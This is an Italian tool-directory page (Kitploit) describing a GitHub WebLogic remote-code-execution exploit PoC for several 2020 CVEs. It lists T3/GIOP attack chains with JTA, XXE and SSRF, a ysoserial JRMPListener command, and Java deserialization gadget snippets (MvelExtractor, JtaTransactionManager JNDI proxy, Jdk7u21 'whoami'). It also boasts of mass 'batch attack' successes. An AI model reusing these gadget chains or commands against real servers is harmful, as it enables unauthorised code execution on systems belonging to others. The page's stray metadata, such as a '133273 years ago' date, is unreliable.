Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE_2020_2546 — CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3, | Kitploit
Strumenti/GitHubGitHub/hktalent/cve_2020_2546
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubhktalent/cve_2020_2546

CVE_2020_2546

CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3,

Vedi Repository
133273 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

Twitter: @Hktalent3135773 Tweet Follow on Twitter

1. Weblogic RCE exploit

CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3 payload exploit poc python3

2. exploit

  • GIOP + invia bind (CVE-2020-2555, CVE-2019-2888, CVE-2019-2888<XXE+SSRF> o altri)
  • GIOP + invia jta (rmi o altri)
  • GIOP + invia jta + SSRF
  • T3 + invia jta
  • T3 + invia jta + SSRF
  • T3 + invia XXE
  • T3 + invia XXE + SSRF

2.1. Server rmi, vedi

  • non usare org.mozilla.classfile.DefiningClassLoader
  • non usare java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'

Per maggiori informazioni: https://github.com/hktalent/CVE-2020-2551

3. Codice

3.1. code1

root@kitploit:~
MVEL.compileExpression
MvelExtractor o = new MvelExtractor("xxx;");
		ObjectOutputStream oo = new ObjectOutputStream(System.out); 
		oo.writeObject(o);
		oo.flush();

3.2. code2

root@kitploit:~
public MsgOutput getObject(final String command) throws Exception {
	  String jndiAddress = command;
		JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
		jtaTransactionManager.setUserTransactionName(jndiAddress);
		MsgOutput remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", jtaTransactionManager), MsgOutput.class);
    return remote;
  }

3.3. code3

root@kitploit:~
public IORDelegate getObject(final String command) throws Exception {
IORDelegate ior = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", new Jdk7u21().getObject("whoami")), IORDelegate.class);
    return ior;
  }

3.4. code4

root@kitploit:~
weblogic.iiop.IIOPRemoteRefd,ObjectMessageImpl

3.5. Codice CVE-2020-2883

https://github.com/hktalent/CVE_2020_2546/issues/4

2883

immagine

4. Payload CVE-2020-2546

Attacco batch: successi innumerevoli

immagine immagine

5. Ringraziamenti

@r4v3zn @0nise

Scarica lo strumento